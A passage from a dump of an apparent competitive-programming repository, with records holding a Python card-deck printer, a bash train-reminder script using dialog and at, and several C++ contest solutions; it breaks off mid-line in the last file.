6D 9D QD 7S TS QS KS 8H 9H TH KH AH\n\n7C 9C JC KC 7D 9D QD 6S 7S 8S TS JS QS 6H 7H 8H JH AH\n6C 8C TC QC AC 6D 8D TD JD KD AD 9S KS AS 9H TH QH KH\n\n6C 7C 8C 9C JC QC AC 6D JD QD 7S JS QS KS 7H 9H QH KH\nTC KC 7D 8D 9D TD KD AD 6S 8S 9S TS AS 6H 8H TH JH AH\n\n6C 7C JC QC KC AC 7D TD JD KD AD 7S 9S KS 6H 8H 9H JH\n8C 9C TC 6D 8D 9D QD 6S 8S TS JS QS AS 7H TH QH KH AH\n\n8C TC JC QC 6D 9D QD KD AD 7S 8S TS JS KS AS 8H TH JH\n6C 7C 9C KC AC 7D 8D TD JD 6S 9S QS 6H 7H 9H QH KH AH\n\n6C 8C JC QC KC AC 8D TD QD KD AD 9S TS 6H 7H 8H JH KH\n7C 9C TC 6D 7D 9D JD 6S 7S 8S JS QS KS AS 9H TH QH AH\n\n6C 9C KC AC 8D JD QD 6S 7S TS JS QS 8H 9H JH QH KH AH\n7C 8C TC JC QC 6D 7D 9D TD KD AD 8S 9S KS AS 6H 7H TH\n\n7C 8C JC QC KC AC 8D 9D JD 6S 7S TS QS KS AS 7H 8H TH\n6C 9C TC 6D 7D TD QD KD AD 8S 9S JS 6H 9H JH QH KH AH\n\n8C AC 7D 8D 9D JD QD KD AD 8S 9S TS JS KS AS 6H 7H TH\n6C 7C 9C TC JC QC KC 6D TD 6S 7S QS 8H 9H JH QH KH AH\n\n8C 9C 6D 7D TD JD QD KD AD 9S QS KS 6H 8H JH QH KH AH\n6C 7C TC JC QC KC AC 8D 9D 6S 7S 8S TS JS AS 7H 9H TH\n\n7C 9C JC QC AC 7D 9D TD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 8C TC KC 6D 8D JD QD KD 6S 7S 8S TS JS QS KS AS 9H\n\n8C 9C TC JC KC AC 7D 8D AD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C QC 6D 9D TD JD QD KD 6S 7S 8S TS JS QS KS AS 9H\n\n6C 9C JC 6D 7D 8D TD KD AD 9S 6H 7H 8H TH JH QH KH AH\n7C 8C TC QC KC AC 9D JD QD 6S 7S 8S TS JS QS KS AS 9H\n\n7C TC AC 7D 8D 9D TD KD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 8C 9C JC QC KC 6D JD QD 6S 7S 8S TS JS QS KS AS 9H\n\n8C TC JC 6D 7D 8D TD JD QD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C 9C QC KC AC 9D KD AD 6S 7S 8S TS JS QS KS AS 9H\n\n9C JC QC KC AC 9D QD KD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C 8C TC 6D 7D 8D TD JD 6S 7S 8S TS JS QS KS AS 9H\n\n6C 7C 8C TC JC QC KC AC 9D 9S 6H 7H 8H TH JH QH KH AH\n9C 6D 7D 8D TD JD QD KD AD 6S 7S 8S TS JS QS KS AS 9H\n\n7C 9C TC 6D 7D 8D QD KD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 8C JC QC KC AC 9D TD JD 6S 7S 8S TS JS QS KS AS 9H\n\n8C 9C 6D 7D TD JD QD KD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C TC JC QC KC AC 8D 9D 6S 7S 8S TS JS KS QS AS 9H\n\n6C 7C 8C TC QC KC AC 8D 9D 9S 6H 7H 8H TH JH QH KH AH\n9C JC 6D 7D TD JD QD KD AD 6S 7S 8S TS JS QS KS AS 9H''')\n\nif k == 13:\n print('''6C TC JC QC 6D 8D 9D TD JD QD KD 7S 8S TS JS KS AS TH\n7C 8C 9C KC AC 7D AD 6S 9S QS 6H 7H 8H 9H JH QH KH AH\n\n6C 8C AC 6D 8D TD JD KD 6S 8S 9S TS JS QS 8H JH KH AH\n7C 9C TC JC QC KC 7D 9D QD AD 7S KS AS 6H 7H 9H TH QH\n\n6C 8C 9C QC KC AC 6D 7D JD AD 8S JS 6H 7H 8H 9H QH AH\n7C TC JC 8D 9D TD QD KD 6S 7S 9S TS QS KS AS TH JH KH\n\n8C TC QC AC 6D 7D TD QD KD 6S 7S JS QS KS 7H 9H TH JH\n6C 7C 9C JC KC 8D 9D JD AD 8S 9S TS AS 6H 8H QH KH AH\n\n6C 9C KC 6D 7D TD JD KD AD TS JS QS AS 9H TH JH QH AH\n7C 8C TC JC QC AC 8D 9D QD 6S 7S 8S 9S KS 6H 7H 8H KH\n\n7C 9C TC QC KC 8D AD 6S 7S 8S 9S JS AS 6H 7H 8H JH KH\n6C 8C JC AC 6D 7D 9D TD JD QD KD TS QS KS 9H TH QH AH\n\nTC JC QC AC 7D 8D AD 7S TS JS QS KS 7H 9H TH JH QH AH\n6C 7C 8C 9C KC 6D 9D TD JD QD KD 6S 8S 9S AS 6H 8H KH\n\n9C QC KC 6D 7D JD QD 6S 7S 8S JS AS 6H 7H 9H TH KH AH\n6C 7C 8C TC JC AC 8D 9D TD KD AD 9S TS QS KS 8H JH QH\n\n6C 6D 7D 8D 9D TD JD QD AD 6S 7S 8S TS QS 7H 8H JH QH\n7C 8C 9C TC JC QC KC AC KD 9S JS KS AS 6H 9H TH KH AH\n\n6C 8C JC QC KC AC 8D 9D 7S TS JS QS AS 7H 8H TH QH AH\n7C 9C TC 6D 7D TD JD QD KD AD 6S 8S 9S KS 6H 9H JH KH\n\n8C 9C 6D 9D KD 6S 7S 8S TS JS QS KS AS 7H 8H 9H KH AH\n6C 7C TC JC QC KC AC 7D 8D TD JD QD AD 9S 6H TH JH QH\n\n7C 8C 9C KC AC 6D 7D 9D JD 6S 8S TS QS KS AS 7H 9H QH\n6C TC JC QC 8D TD QD KD AD 7S 9S JS 6H 8H TH JH KH AH\n\n6C 8C JC KC AC 9D 9S TS QS KS AS 6H 7H 8H JH QH KH AH\n7C 9C TC QC 6D 7D 8D TD JD QD KD AD 6S 7S 8S JS 9H TH''')\nif k == 2:\n print('''KS QD 8D QC 8S 8C JD 9H AC TH 9S 9D QH 7H 8H TS 7S 9C\n6D JS 7D KH QS TC AD AS KC 6C 7C TD AH KD 6S JC JH 6H\n\nJC JS 8S TD JD KH 7D 9C KC TH QD 8D 7H TC KD 9H 8C 6D\n7S AC QH AD 8H TS 6H JH 6C AH 7C 6S 9D QC AS QS KS 9S''')\n" }, { "alpha_fraction": 0.5052106976509094, "alphanum_fraction": 0.5265065431594849, "avg_line_length": 35.78333282470703, "blob_id": "91420e2c53438769574300a1b814e5e7fa374b30", "content_id": "91cb0a5dc622a92ea4a4874381aaafe80b2a4fc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2319, "license_type": "no_license", "max_line_length": 213, "num_lines": 60, "path": "/scripts/choose-train.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nCOUNTER=1\nRADIOLIST=\"\" # variable where we will keep the list entries for radiolist dialog\nOLD=$IFS\nIFS=$'\\n' \nar=()\ncount=25\nminutesBefore=57\nchoose=\"/home/igorjan/new/Санкт-Петербург—Лигово.out\"\ngap=7\n\nOPTS=`getopt -o b:c:h:g: -l before:,count:,choose:,gap:,help -- \"$@\"`\nif [ $? != 0 ]; then exit 1; fi\neval set -- \"$OPTS\"\n\nusage () {\n echo \"-o b:c:h:g: -l before:,count:,choose:,gap:,help\"\n exit 0\n}\n\n#parsing arguments\nwhile true ; do\n case \"$1\" in\n -h | --help ) usage ; shift;;\n -b | --before) minutesBefore=$2; shift 2;;\n -c | --count ) count=$2 ; shift 2;;\n -g | --gap ) gap=$2 ; shift 2;;\n --choose ) choose=$2 ; shift 2;;\n -- ) shift ; break;;\n esac\ndone\nminutesBeforeCritical=$(($minutesBefore - $gap))\n\n\nfor i in $(cat $choose | tail -$count); do\n train=${i:0:5}\n desc=${i:6}\n desc=`sed -E \"s/\\s+/ /g\" <<< $desc`\n desc=`sed \"s/^\\s//g\" <<< $desc`\n desc=`sed \"s/\\s$//g\" <<< $desc`\n off=off\n if [ \"$train\" == \"20:12\" ]; then off=on; fi\n ar+=($train \"$desc\" $off)\ndone\nIFS=$OLD\nexec 3>&1;\n\nresult=$(dialog --title \"Choose train\" --default-item \"20:12\" --radiolist \"Time\" 0 0 $count \"${ar[@]}\" 2>&1 1>&3);\n\nif [ ! -z \"$result\" ]; then\n exec 3>&-;\n minsWarning=`date +%H:%M --date \"$result -GMT+3 -$minutesBefore min\"`\n minsCritical=`date +%H:%M --date \"$result -GMT+3 -$minutesBeforeCritical min\"`\n spaces=\" \"\n for i in $(atq | cut -f 1); do atrm $i; done\n at \"$minsWarning\" <<< \"DISPLAY=:0 notify-send -u critical -i dialog-information 'Warning!!!' '\\n\\n\\nРаспидорит электричку $result. Осталось $minutesBefore минут до электрички! $spaces'\" 1>&2\n at \"$minsCritical\" <<< \"DISPLAY=:0 notify-send -u critical -i dialog-information 'Critical!!!' '\\n\\n\\nУже пидорит электричку $result. Осталось $minutesBeforeCritical минут до электрички! $spaces'\" 1>&2\n echo \"Notifications are installed to $minsWarning and $minsCritical!\"\nfi\n" }, { "alpha_fraction": 0.50535649061203, "alphanum_fraction": 0.5160694718360901, "avg_line_length": 36.0684928894043, "blob_id": "30b8e62e354ad0732bd6eb7c4de353c71512b367", "content_id": "5c5c17a3abe09f4650ac15ea081c241ee4933270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2707, "license_type": "no_license", "max_line_length": 928, "num_lines": 73, "path": "/CodeForce/0369/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n#include <map>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"start\";\nstring FILEINPUT = FILENAME;\nint mx = 0;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);mx=max(mx,x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint n, k;\nvector< vector<pair<int, int> > > edges;\nvector<bool> used;\nvi a;\nint dfs(int u)\n{\n used[u] = true;\n int mx = 0;\n forn(i, edges[u].size())\n if (!used[edges[u][i].first])\n {\n int t = dfs(edges[u][i].first);\n if (edges[u][i].second && !t)\n {\n mx++;\n a.pb(edges[u][i].first + 1);\n }\n else\n mx += t;\n }\n return mx;\n}\n\nvoid run()\n{\n readln(n);\n edges.resize(n + 1);\n used.resize(n + 1, false);\n int x, y, t;\n forn(i, n - 1)\n {\n readln(x, y, t);\n edges[x - 1].pb({y - 1, t - 1});\n edges[y - 1].pb({x - 1, t - 1});\n }\n cout << dfs(0) << endl;\n writeln(a);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\n" }, { "alpha_fraction": 0.5611814260482788, "alphanum_fraction": 0.5696202516555786, "avg_line_length": 32.85714340209961, "blob_id": "65bb154856d021f2fdc65d91af74d7ed5840cbca", "content_id": "6d800232c1ee35300b2a0d733579e9eef0bad05a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/trash/aplusb.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open(\"aplusb.in\", \"r\")\nt = open(\"aplusb.out\", \"w\")\na, b = [float(x) for x in f.readline().split()]\nt.write(\"%.11f\\n\" % (a + b))\narray = [long(x) for x in f.readline().split()]\narray.reverse()\nt.writelines([\"%s \" % i for i in array])\n" }, { "alpha_fraction": 0.3632596731185913, "alphanum_fraction": 0.3667127192020416, "avg_line_length": 19.62686538696289, "blob_id": "21307965efdd1d2a55bbe710a20254d98d227633", "content_id": "aec8698e6a05238aca158cfc857b046e010621e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1815, "license_type": "no_license", "max_line_length": 70, "num_lines": 67, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <cstdio>\r\n#include <bits/stdc++.h>\r\n \r\nusing namespace std;\r\n \r\nstruct event\r\n{\r\n    int x;\r\n    int y;\r\n    int i;\r\n    event(){}\r\n    event(int x, int y, int i) : x(x), y(y), i(i) {};\r\n};\r\n \r\nbool operator<(const event& a, const event& b)\r\n{\r\n    if (b.x == a.x)\r\n        if (b.y == a.y)\r\n            return b.i > a.i;\r\n        else\r\n            return b.y > a.y;\r\n    else\r\n        return b.x > a.x;\r\n}\r\n \r\n//ostream& operator<<(ostream&out, event x)\r\n//{\r\n    //return out << (x.y < 0 ? \"end\" : \"begin\") << \" \" << x.i << \"\\n\";\r\n//}\r\n \r\nint main() {\r\n    //freopen(\"input.txt\", \"r\", stdin);\r\n    int n, k;\r\n    vector<event> q;\r\n    scanf(\"%d%d\", &n, &k);\r\n    int x, y;\r\n    vector<bool> used(n, true);\r\n    set<pair<int, int>> s;\r\n    int ans = 0;\r\n    for (int i = 0; i < n; ++i)\r\n    {\r\n        scanf(\"%d%d\", &x, &y);\r\n        q.push_back(event(x, y, i));\r\n        q.push_back(event(y, -y, i));\r\n    }\r\n \r\n    sort(q.begin(), q.end());\r\n \r\n    for (int i = 0; i < q.size(); ++i)\r\n        if (used[q[i].i])\r\n        {\r\n            if (q[i].y < 0)\r\n            {\r\n                ans++;\r\n                s.erase({q[i].y, q[i].i});\r\n            }\r\n            else\r\n            {\r\n                s.insert({-q[i].y, q[i].i});\r\n                while (s.size() > k)\r\n                    used[s.begin()->second] = false,\r\n                    s.erase(s.begin());\r\n            }\r\n        }\r\n    cout << ans << \"\\n\";\r\n}\n" }, { "alpha_fraction": 0.4525805115699768, "alphanum_fraction": 0.46449050307273865, "avg_line_length": 33.34848403930664, "blob_id": "bfbc37b70f18209a99aaffc8477d0d54280570a0", "content_id": "02daf62ac14c58115d3b9a331063bf886d189b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2267, "license_type": "no_license", "max_line_length": 928, "num_lines": 66, "path": "/2013/2013RCC1/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvector< pair<int, int> > b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n int t;\n int check;\n readln(t);\n for (int tt = 0; tt < t; tt++)\n {\n int n;\n readln(n);\n a.clear();\n b.clear();\n readln(a, n);\n sort(a.begin(), a.end());\n b.push_back(make_pair(a[0], 1));\n for (int i = 1; i < n; i++)\n if (a[i] == a[i - 1])\n b[b.size() - 1].second++; else\n b.push_back(make_pair(a[i], 1));\n n = b.size();\n int i = 0, j = 0;\n long long ans = 0;\n while (true)\n {\n if (b[i].second < 2)\n {\n i++;\n continue;\n }\n check = 2 * b[i].first + b[0].first;\n int temp = *upper_bound(a.begin(), a.end(), check);\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.46683353185653687, "alphanum_fraction": 0.4762202799320221, "avg_line_length": 21.19444465637207, "blob_id": "e61127927529d575f911973243eee77b23e7ab11", "content_id": "06d60223836213072736dbd0c2515654d774afd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1598, "license_type": "no_license", "max_line_length": 85, "num_lines": 72, "path": "/CodeForce/0382/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nint main()\n{\n int a, b, w, x, c;\n cin >> a >> b >> w >> x >> c;\n if (c <= a)\n {\n cout << 0 << endl;\n return 0;\n }\n ll count = 0;\n int delta = 0;\n c -= a;\n vector<pii> v(w);\n vector<bool> used(w, false);\n fori(w)\n if (i >= x)\n v[i] = make_pair(i - x, 1);\n else\n v[i] = make_pair(i + w - x, 0);\n\n while (!used[b] && delta != c)\n {\n used[b] = true;\n delta += v[b].second;\n b = v[b].first;\n count++;\n }\n if (delta == c)\n {\n cout << count << endl;\n return 0;\n }\n\n if (c % delta)\n count = count * (c / delta),\n c %= delta;\n else\n count = count * (c / delta - 1),\n c = delta;\n\n while (c)\n {\n c -= v[b].second;\n b = v[b].first;\n count++;\n }\n cout << count << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.401025652885437, "alphanum_fraction": 0.4092307686805725, "avg_line_length": 19.103092193603516, "blob_id": "3b95e49404be19906d1ce5f4725f8b102928ebcd", "content_id": "c98c7ffaf10e8fcf3743f39cb0f6b483dd46d14c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1950, "license_type": "no_license", "max_line_length": 60, "num_lines": 97, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.01/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <fstream>\n#include <map>\n#include <vector>\n#include <set>\n#include <deque>\n#include <unordered_map>\n#include <unordered_set>\n#include <algorithm>\n#include <stdio.h>\n\n\ntypedef unsigned long long ull;\ntypedef long long ll;\n\n#define FN \"cave\"\n\nusing namespace std;\n\nstruct pp {\n int f, c;\n};\n\npp data[1000010];\n\nclass why {\npublic:\n bool operator()(int a, int b) {\n return data[a].c < data[b].c;\n }\n};\n\nint main()\n{\n //ifstream in(FN \".in\");\n //ofstream out(FN \".out\");\n //istream &in = cin;\n //ostream &out = cout;\n\n int t;\n //in >> t;\n scanf(\"%d\",&t);\n\n vector<int> order;\n\n for(int T = 1; T <= t; T++)\n {\n int n;\n //in >> n;\n scanf(\"%d\",&n);\n\n int total_area = 0;\n\n order.clear();\n order.reserve(n);\n for(int i = 0; i < n; i++)\n //in >> data[i].f;\n scanf(\"%d\",&data[i].f);\n for(int i = 0; i < n; i++)\n {\n //in >> data[i].c;\n scanf(\"%d\",&data[i].c);\n total_area += data[i].c-data[i].f;\n order.push_back(i);\n }\n\n sort(order.begin(),order.end(),why());\n\n for(int i = 0; i < n; i++)\n {\n int cx = order[i];\n int cc = data[cx].c;\n for(int j = cx-1; j >= 0; j--)\n {\n if(data[j].c < cc || data[j].f == data[j].c)\n break;\n cc = max(data[j].f,cc);\n total_area -= (data[j].c - cc);\n data[j].c = cc;\n }\n for(int j = cx+1; j < n; j++)\n {\n if(data[j].c < cc || data[j].f == data[j].c)\n break;\n cc = max(data[j].f,cc);\n total_area -= (data[j].c - cc);\n data[j].c = cc;\n }\n }\n\n //out << total_area;\n printf(\"%d\",total_area);\n }\n\n //out.close();\n return 0;\n}\n" }, { "alpha_fraction": 0.5180230140686035, "alphanum_fraction": 0.5328873991966248, "avg_line_length": 46.21052551269531, "blob_id": "df72dcd324fe39c32351dfe4783d6c2a82a68d6c", "content_id": "c8b7ab4b04566ed9e402850aac29330ec1c63d50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2691, "license_type": "no_license", "max_line_length": 928, "num_lines": 57, "path": "/CodeForce/0382/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nvoid run()\n{\n string s, s1;\n cin >> s >> s1;\n int k = s.find('|');\n int l = s1.size();\n int n = s.size() - k - 1;\n// writeln(n, k);\n int d = max(n, k) - min(n, k);\n l -= d;\n if (l < 0 || l % 2)\n {\n printf(\"Impossible\\n\");\n return;\n }\n if (k < n)\n printf(\"%s%s|%s%s\\n\", s.substr(0, k).c_str(), s1.substr(0, l / 2 + d).c_str(), s.substr(k + 1).c_str(), s1.substr(l / 2 + d).c_str());\n else\n printf(\"%s%s|%s%s\\n\", s.substr(0, k).c_str(), s1.substr(l / 2 + d).c_str(), s.substr(k + 1).c_str(), s1.substr(0, l / 2 + d).c_str());\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.5276365876197815, "alphanum_fraction": 0.5503494143486023, "avg_line_length": 28.013824462890625, "blob_id": "291a42b51ffdcbd434b796e5a4e5499c57bcb874", "content_id": "33a1ffa98773f586caee377e19f8a9425c3d0cf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6296, "license_type": "no_license", "max_line_length": 175, "num_lines": 217, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.14/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 June 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"ref\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%.4f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... tail);\nvoid writeln(){printf(\"\\n\");}void writeln2(){printf(\"\\n\");}void readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\ntemplate <typename T> class Matrix\n{\npublic:\n std::vector<std::vector<T> > a;\n unsigned n;\n unsigned m;\n\n Matrix(unsigned n, unsigned m, const T& initial);\n Matrix(std::vector<std::vector<T> >& rhs);\n Matrix<T>& operator*=(const Matrix<T>& rhs);\n Matrix<T> operator*(const Matrix<T>& rhs);\n};\n\ntemplate<typename T>\nMatrix<T>::Matrix(std::vector<std::vector<T> >& rhs)\n{\n this->n = rhs.size();\n this->m = rhs[0].size();\n this->a = rhs;\n}\n\ntemplate<typename T>\nMatrix<T>::Matrix(unsigned n, unsigned m, const T& initial)\n{\n this->n = n;\n this->m = m;\n a.resize(n);\n fori(n)\n a[i].resize(m, initial);\n}\n\ntemplate<typename T>\nMatrix<T> Matrix<T>::operator*(const Matrix<T>& rhs)\n{\n unsigned n = this->n;\n unsigned m = rhs.m;\n Matrix result(n, m, (T) 0);\n fori(n)\n forj(m)\n for (unsigned k = 0; k < this->m; k++)\n result.a[i][j] += this->a[i][k] * rhs.a[k][j];\n return result;\n}\n\ntemplate<typename T>\nMatrix<T>& Matrix<T>::operator*=(const Matrix<T>& rhs)\n{\n Matrix result = (*this) * rhs;\n (*this) = result;\n return *this;\n}\n\ntemplate<typename T>\nstd::vector<T> operator*(const std::vector<T>& a, const Matrix<T>& rhs)\n{\n std::vector<T> result(rhs.m, (T) 0);\n for (int i = 0; i < rhs.m; ++i)\n for (int j = 0; j < a.size(); ++j)\n result[i] += a[j] * rhs.a[j][i];\n return result;\n}\n\nint n, m;\n\nvoid run()\n{\n readln(m);\n int x1, x2, x3, y1, y2, y3, z1, z2, z3, a, b, c, d, e, f, nx, ny, nz, nn, D, coef = 1.;\n vector<vector<int> > ddd = {{1, 0, 0, 0}, {0, 1, 0, 0}, {0, 0, 1, 0}, {0, 0, 0, 1}};\n Matrix<int> mtrx(ddd), temp(ddd);\n fori(m)\n readln(x1, y1, z1, x2, y2, z2, x3, y3, z3),\n a = x2 - x1, \n b = y2 - 